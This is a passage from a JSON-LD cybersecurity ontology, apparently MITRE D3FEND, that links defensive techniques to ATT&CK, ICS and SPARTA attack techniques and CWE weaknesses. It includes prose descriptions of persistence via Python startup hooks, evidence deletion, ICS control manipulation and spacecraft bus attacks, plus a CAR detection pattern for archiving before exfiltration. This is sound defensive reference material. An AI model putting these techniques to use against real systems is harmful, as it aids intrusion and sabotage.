          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:N6af8739411134ca38f1a662ab0abf1bb"
        }
      ]
    },
    {
      "@id": "_:N6af8739411134ca38f1a662ab0abf1bb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:neutralizes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:FileFooterBlockSignature",
      "@type": "owl:Class",
      "d3f:definition": "A sequence of bytes used to identify and validate the footer section within a file.",
      "rdfs:label": "File Footer Block Signature",
      "rdfs:subClassOf": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "d3f:EventLogEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event that captures actions or operations related to the management of system event logs, including modifications, access, and service state changes.",
      "rdfs:label": "Event Log Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/event_log_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N7d135918c27940d08f95d171119ea91a"
        }
      ]
    },
    {
      "@id": "_:N7d135918c27940d08f95d171119ea91a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:T1636.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1636.002",
      "d3f:definition": "Adversaries may utilize standard operating system APIs to gather call log data. On Android, this can be accomplished using the Call Log Content Provider. iOS provides no standard API to access the call log.",
      "rdfs:label": "Call Log - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1636"
      },
      "skos:prefLabel": "Call Log"
    },
    {
      "@id": "d3f:VirtualMemorySpace",
      "@type": "owl:Class",
      "d3f:definition": "Virtual memory is a memory management technique where secondary memory can be used as if it were a part of the main memory. Virtual memory uses hardware and software to enable a computer to compensate for physical memory shortages",
      "rdfs:isDefinedBy": {
        "@id": "https://whatis.techtarget.com/definition/memory"
      },
      "rdfs:label": "Virtual Memory Space",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Virtual_memory"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryAddressSpace"
      }
    },
    {
      "@id": "d3f:BayesianLinearRegressionLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-BLRL",
      "d3f:definition": "A supervised learning method that builds a Bayesian linear regression model using training data.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Bayesian linear regression. [Link](https://en.wikipedia.org/wiki/Bayesian_linear_regression)",
      "rdfs:label": "Bayesian Linear Regression Learning",
      "rdfs:seeAlso": {
        "@id": "d3f:BayesianLinearRegression"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysisLearning"
      }
    },
    {
      "@id": "d3f:T1588.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.004",
      "d3f:definition": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.",
      "rdfs:label": "Digital Certificates",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:Instance-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-IBTL",
      "d3f:definition": "Instance-based transfer learning methods try to reweight the samples in the source domain in an attempt to correct for marginal distribution differences. These reweighted instances are then directly used in the target domain for training.",
      "d3f:kb-article": "## References\nGeorgian Impact Blog. (n.d.). Transfer Learning Part 1. [Link](https://medium.com/georgian-impact-blog/transfer-learning-part-1-ed0c174ad6e7#:~:text=Homogeneous%20Transfer%20Learning-,1.,the%20target%20domain%20for%20training).",
      "rdfs:label": "Instance-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HomogenousTransferLearning"
      }
    },
    {
      "@id": "d3f:CWE-1327",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1327",
      "d3f:definition": "The product assigns the address 0.0.0.0 for a database server, a cloud service/instance, or any computing resource that communicates remotely.",
      "rdfs:label": "Binding to an Unrestricted IP Address",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:NTPBroadcastEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an NTP server broadcasts time synchronization messages to multiple clients simultaneously, enabling synchronization without individual request-response cycles.",
      "rdfs:label": "NTP Broadcast Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NTPEvent"
      }
    },
    {
      "@id": "d3f:ShadowStackComparisons",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ShadowStackComparisons"
      ],
      "d3f:analyzes": {
        "@id": "d3f:StackFrame"
      },
      "d3f:d3fend-id": "D3-SSC",
      "d3f:definition": "Comparing a call stack in system memory with a shadow call stack maintained by the processor to determine unauthorized shellcode activity.",
      "d3f:kb-article": "## How it works\nThis technique compares the call stack stored in system memory with the shadow call stack maintained in the cache memory of the processor.  The two are compared because a return-oriented programming attack may only be able to control or spoof the call stack and not the shadow call stack. Mismatches are counted, and if the number of mismatches exceeds a certain threshold, it is an indication of unauthorized activity and a security response action is performed.\n\n## Considerations\nIf the threshold for detecting a stack anomaly is low, it may not detect a return-oriented attack with just one gadget, such as a return-to-libc or return-to-plt attack.  Additionally, this technique may not detect JOP (Jump-oriented programming), as the return instruction is not executed.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ThreatDetectionForReturnOrientedProgramming_CrowdstrikeInc"
      },
      "rdfs:label": "Shadow Stack Comparisons",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:N36cfe6e285174d00960501fd640404d4"
        }
      ]
    },
    {
      "@id": "_:N36cfe6e285174d00960501fd640404d4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:OTAlarmMessage",
      "@type": "owl:Class",
      "d3f:definition": "Report danger, hazards, or serious errors.",
      "rdfs:comment": [
        "BACnet: acknowledgeAlarm\nBACnet: confirmedEventNotification\nBACnet: getAlarmSummary\nBACnet: unconfirmedEventNotification\nBACnet: lifeSafetyOperation\nBACnet: Abort: 1\nBACnet: Abort: 2\nBACnet: Abort: 3\nBACnet: Abort: 4\nBACnet: Abort: 5\nBACnet: Abort: 6\nBACnet: Abort: 7\nBACnet: Abort: 8\nBACnet: Abort: 9\nBACnet: Abort: 10\nBACnet: Abort: 11\nBACnet: Abort: 12 ",
        "GE-SRTP: RETURN FAULT TABLE\nGE-SRTP: CLEAR FAULT TABLE"
      ],
      "rdfs:label": "OT Alarm Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDiagnosticsMessage"
      }
    },
    {
      "@id": "d3f:CWE-273",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-273",
      "d3f:definition": "The product attempts to drop privileges but does not check or incorrectly checks to see if the drop succeeded.",
      "rdfs:label": "Improper Check for Dropped Privileges",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-271"
        },
        {
          "@id": "d3f:CWE-754"
        }
      ]
    },
    {
      "@id": "d3f:T0846",
      "@type": "owl:Class",
      "d3f:attack-id": "T0846",
      "d3f:definition": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used. (Citation: Enterprise ATT&CK January 2018)",
      "rdfs:label": "Remote System Discovery - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Remote System Discovery"
    },
    {
      "@id": "d3f:CWE-926",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-926",
      "d3f:definition": "The Android application exports a component for use by other applications, but does not properly restrict which applications can launch the component or access the data it contains.",
      "rdfs:label": "Improper Export of Android Application Components",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:T1629.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1629.001",
      "d3f:definition": "Adversaries may abuse the Android device administration API to prevent the user from uninstalling a target application. In earlier versions of Android, device administrator applications needed their administration capabilities explicitly deactivated by the user before the application could be uninstalled. This was later updated so the user could deactivate and uninstall the administrator application in one step.",
      "rdfs:label": "Prevent Application Removal - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1629"
      },
      "skos:prefLabel": "Prevent Application Removal"
    },
    {
      "@id": "d3f:MessageAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:MessageAnalysis"
      ],
      "d3f:d3fend-id": "D3-MA",
      "d3f:definition": "Analyzing email or instant message content to detect unauthorized activity.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "d3f:kb-article": "## Technique Overview\n\nEmail and messaging are frequently used to deliver malicious content to targets. These enterprise capabilities are used to deliver software exploits or social engineering tricks. If the recipient of a message trusts the sender, attackers can avoid escalating suspicion.\n\nEmails and messages are also complex data structures. They contain files and links, and complex data encodings which vary region to region. Thus the defensive techniques used to analyze emails and messages are highly varied ranging from deep content analysis and execution to social network graph-style analytics to analyze trust or risk.",
      "d3f:synonym": [
        "Electronic Message Analysis",
        "Email Or Messaging Analysis"
      ],
      "rdfs:label": "Message Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N96596a3048da4ab2ac5c8f3f1fd630c4"
        }
      ]
    },
    {
      "@id": "_:N96596a3048da4ab2ac5c8f3f1fd630c4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:FingerPrintScannerInputDevice",
      "@type": "owl:Class",
      "d3f:definition": "A fingerprint sensor is an electronic device used to capture a digital image of the fingerprint pattern. The captured image is called a live scan. This live scan is digitally processed to create a biometric template (a collection of extracted features) which is stored and used for matching. Many technologies have been used including optical, capacitive, RF, thermal, piezoresistive, ultrasonic, piezoelectric, and MEMS.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Fingerprint#Fingerprint_sensors"
      },
      "rdfs:label": "Finger Print Scanner Input Device",
      "rdfs:subClassOf": {
        "@id": "d3f:ImageScannerInputDevice"
      },
      "skos:altLabel": "Fingerprint Sensor"
    },
    {
      "@id": "d3f:T1590.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590.003",
      "d3f:definition": "Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.",
      "rdfs:label": "Network Trust Dependencies",
      "rdfs:subClassOf": {
        "@id": "d3f:T1590"
      }
    },
    {
      "@id": "d3f:LM-0002",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0002",
      "d3f:definition": "On flat architectures, where remote terminals, subsystems, and payloads share a common bus with minimal partitioning, any node that can transmit may influence many others. An attacker leverages this by forging message IDs or terminal addresses, replaying actuator/sensor frames, seizing or imitating bus-controller roles, or abusing gateway bridges that forward traffic between links (e.g., 1553↔SpaceWire/CAN). Because consumers often act on the latest valid-looking message, crafted traffic from one compromised device can reconfigure peers, toggle power domains, or write persistent parameters. Weak role enforcement and broadcast semantics allow privilege escalation from a peripheral to effective system-wide influence, turning the shared medium into a highway for further compromise.",
      "rdfs:label": "Exploit Lack of Bus Segregation - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0002/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Exploit Lack of Bus Segregation"
    },
    {
      "@id": "d3f:restores",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x restores y: The entity x returns entity y to its known-good or previous state.",
      "rdfs:label": "restores",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Vulnerability Monitoring and Scanning | Discoverable Information",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": [
        {
          "@id": "d3f:DecoyEnvironment"
        },
        {
          "@id": "d3f:DecoyObject"
        }
      ],
      "rdfs:label": "RA-5(4)"
    },
    {
      "@id": "d3f:CCI-000346_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated mechanisms to enforce access restrictions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000346"
    },
    {
      "@id": "d3f:DE-0003.04",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.04",
      "d3f:definition": "Threat actors may target the on-board command receivers received signal parameters (i.e., automatic gain control (AGC)) in order to stop specific commands or signals from being processed by the spacecraft. For ground controllers to communicate with spacecraft in orbit, the on-board receivers need to be configured to receive signals with a specific signal to noise ratio (ratio of signal power to the noise power). Targeting values related to the antenna signaling that are modifiable can prevent the spacecraft from receiving ground commands.",
      "d3f:modifies": {
        "@id": "d3f:SystemPlatformVariable"
      },
      "rdfs:label": "Command Receivers Received Signal Strength - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/04/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:N8ddb605f34194f0486ff3df1892e8397"
        }
      ],
      "skos:prefLabel": "Command Receivers Received Signal Strength"
    },
    {
      "@id": "_:N8ddb605f34194f0486ff3df1892e8397",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:T1546.018",
      "@type": "owl:Class",
      "d3f:attack-id": "T1546.018",
      "d3f:definition": "Adversaries may achieve persistence by leveraging Python’s startup mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py` or `usercustomize.py` modules. These files are automatically processed during the initialization of the Python interpreter, allowing for the execution of arbitrary code whenever Python is invoked.(Citation: Volexity GlobalProtect CVE 2024)",
      "rdfs:label": "Python Startup Hooks",
      "rdfs:subClassOf": {
        "@id": "d3f:T1546"
      }
    },
    {
      "@id": "d3f:T1584.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.008",
      "d3f:definition": "Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.",
      "rdfs:label": "Network Devices",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:BinaryLargeObject",
      "@type": "owl:Class",
      "d3f:definition": "A binary large object (BLOB) is a collection of binary data stored as a single entity. Blobs are typically images, audio or other multimedia objects, though sometimes binary executable code is stored as a blob.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Binary_large_object"
      },
      "rdfs:label": "Binary Large Object",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": [
        "BLOB",
        "Blob"
      ]
    },
    {
      "@id": "d3f:T1070.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1070.004",
      "d3f:definition": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.",
      "d3f:deletes": {
        "@id": "d3f:File"
      },
      "d3f:may-modify": {
        "@id": "d3f:File"
      },
      "rdfs:label": "File Deletion",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1070"
        },
        {
          "@id": "_:N50b61974de3f4499a614d57f8d7063c9"
        },
        {
          "@id": "_:Ndd37d2ac220e429fb4051ad1c207eed9"
        }
      ]
    },
    {
      "@id": "_:N50b61974de3f4499a614d57f8d7063c9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:Ndd37d2ac220e429fb4051ad1c207eed9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:operating-system",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x operating-system y: The product x is supported on operating system y.",
      "rdfs:label": {
        "@language": "en",
        "@value": "operating-system"
      },
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:Reference-RunDLL32.exeMonitoring_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-03-006/"
      },
      "d3f:kb-abstract": "Adversaries may find it necessary to use Dyanamic-link Libraries (DLLs) to evade defenses. One way these DLLs can be \"executed\" is through the use of the built-in Windows utility RunDLL32, which allows a user to execute code in a DLL, providing the name and optional arguments to an exported entry point. Windows uses RunDll32 legitimately in its normal operation, but with a proper baseline and understanding of the environment, monitoring its usage could be fruitful.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-03-006: RunDLL32.exe monitoring",
      "rdfs:label": "Reference - CAR-2014-03-006: RunDLL32.exe monitoring - MITRE"
    },
    {
      "@id": "d3f:may-invoke",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-invoke y: The entity x may invoke the thing y; that is, 'x invokes y' may be true.",
      "rdfs:label": "may-invoke",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:FileCarving",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileCarving"
      ],
      "d3f:analyzes": {
        "@id": "d3f:FileTransferNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-FC",
      "d3f:definition": "Identifying and extracting files from network application protocols through the use of network stream reassembly software.",
      "d3f:kb-article": "## How it works\nProtocol stream reassembly software recreates a directional byte stream by analyzing captured network packets. Once the stream is reassembled pattern matching is applied to determine if it contains a file of interest. Files of interest range from executable, archive, or document file formats. Once the file is captured, it is then processed with standard File Analysis Techniques. Example network protocols include HTTP, SMTP, FTP, HTTP/2, and TLS/HTTP/Dropbox.\n\n## Considerations\n- This is an error prone process due to the intricacies of network protocols and network packet capture.  For example reassembly may be done in real-time or streaming fashion, or packets may be written to disk, then bulk processed.  The packets may arrive out of order, with fragmentation, duplicates, or re-transmissions.  The reassembly software must compensate for the imperfect packet stream in order to recreate the well formed file which was transmitted.\n- File type identification can be a difficult process which can be exploited by adversaries.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ComputerWormDefenseSystemAndMethod_FireEyeInc"
      },
      "rdfs:label": "File Carving",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N1e26f9b4e5dd40cb8e1be254d8a58416"
        }
      ]
    },
    {
      "@id": "_:N1e26f9b4e5dd40cb8e1be254d8a58416",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileTransferNetworkTraffic"
      }
    },
    {
      "@id": "d3f:Reference-CommandLineUsageOfArchivingSoftware_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-07-005/"
      },
      "d3f:kb-abstract": "Before exfiltrating data that an adversary has collected, it is very likely that a compressed archive will be created, so that transfer times are minimized and fewer files are transmitted. There is variety between the tools used to compress data, but the command line usage and context of archiving tools, such as ZIP, RAR, and 7ZIP, should be monitored.\n\nIn addition to looking for RAR or 7z program names, command line usage of 7Zip or RAR can be detected with the flag usage of \"\\* a \\*\". This is helpful, as adversaries may change program names.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-07-005: Command Line Usage of Archiving Software",
      "rdfs:label": "Reference - CAR-2013-07-005: Command Line Usage of Archiving Software - MITRE"
    },
    {
      "@id": "d3f:WindowsRegistry",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:WindowsRegistryKey"
      },
      "d3f:definition": "The Windows Registry is a hierarchical database that stores low-level settings for the Microsoft Windows operating system and for applications that opt to use the registry. The kernel, device drivers, services, Security Accounts Manager, and user interface can all use the registry. The registry also allows access to counters for profiling system performance.",
      "rdfs:isDefinedBy": [
        {
          "@id": "dbr:Windows_Registry"
        },
        {
          "@id": "https://learn.microsoft.com/en-us/troubleshoot/windows-server/performance/windows-registry-advanced-users"
        }
      ],
      "rdfs:label": "Windows Registry",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemConfigurationDatabase"
        },
        {
          "@id": "_:Ndb1b748e32944ceb8af3065e7b496157"
        }
      ]
    },
    {
      "@id": "_:Ndb1b748e32944ceb8af3065e7b496157",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryKey"
      }
    },
    {
      "@id": "d3f:T0829",
      "@type": "owl:Class",
      "d3f:attack-id": "T0829",
      "d3f:definition": "Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)",
      "rdfs:label": "Loss of View - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Loss of View"
    },
    {
      "@id": "d3f:T0831",
      "@type": "owl:Class",
      "d3f:attack-id": "T0831",
      "d3f:definition": "Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection.",
      "rdfs:label": "Manipulation of Control - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Manipulation of Control"
    },
    {
      "@id": "d3f:SystemInitConfigAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemInitConfigAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:SystemInitConfiguration"
      },
      "d3f:d3fend-id": "D3-SICA",
      "d3f:definition": "Analysis of any system process startup configuration.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AutorunDifferences_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-09-005%3AAppInitDLLs_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-001%3ABootOrLogonInitializationScripts_MITRE"
        }
      ],
      "d3f:synonym": [
        "Autorun Analysis",
        "Startup Analysis"
      ],
      "rdfs:label": "System Init Config Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:Nea9ba776257f4e639e07907dd670deb9"
        }
      ],
      "skos:altLabel": "System Initialization Configuration Analysis"
    },
    {
      "@id": "_:Nea9ba776257f4e639e07907dd670deb9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemInitConfiguration"
      }
    },
    {
      "@id": "d3f:CWE-73",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-73",
      "d3f:definition": "The product allows user input to control or influence paths or file names that are used in filesystem operations.",
      "rdfs:label": "External Control of File Name or Path",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-610"
        },
        {
          "@id": "d3f:CWE-642"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1054",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1054",
      "d3f:definition": "The code at one architectural layer invokes code that resides at a deeper layer than the adjacent layer, i.e., the invocation skips at least one layer, and the invoked code is not part of a vertical utility layer that can be referenced from any horizontal layer.",
      "rdfs:label": "Invocation of a Control Element at an Unnecessarily Deep Horizontal Layer",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1061"
      }
    },
    {
      "@id": "d3f:T1542.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1542.002",
      "d3f:definition": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.",
      "d3f:modifies": {
        "@id": "d3f:Firmware"
      },
      "rdfs:label": "Component Firmware",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1542"
        },
        {
          "@id": "_:N4a424a6868bc41f88a435dab9ea8f6ff"
        }
      ]
    },
    {
      "@id": "_:N4a424a6868bc41f88a435dab9ea8f6ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:ImpersonateUser",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemCall"
      ],
      "d3f:forges": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Impersonate User",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nb65d93233035400895145761e6fb9b76"
        }
      ]
    },
    {
      "@id": "_:Nb65d93233035400895145761e6fb9b76",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:forges"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CCI-000417_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:ExecutionIsolation"
        },
        {
          "@id": "d3f:NetworkIsolation"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization disables network access by unauthorized components/devices or notifies designated organizational officials.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000417"
    },
    {
      "@id": "d3f:may-be-modified-by",
      "@type": "owl:ObjectProperty",
      "owl:inverseOf": {
        "@id": "d3f:may-modify"
      },
      "rdfs:label": "may-be-modified-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:inventories",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x inventories y: The entity x systematically discovers entity y and records its presence and key details for tracking.",
      "rdfs:label": "inventories",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:EmailRemoval",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:EmailRemoval"
      ],
      "d3f:d3fend-id": "D3-ER",
      "d3f:definition": "The email removal technique deletes email files from system storage.",
      "d3f:deletes": {
        "@id": "d3f:Email"
      },
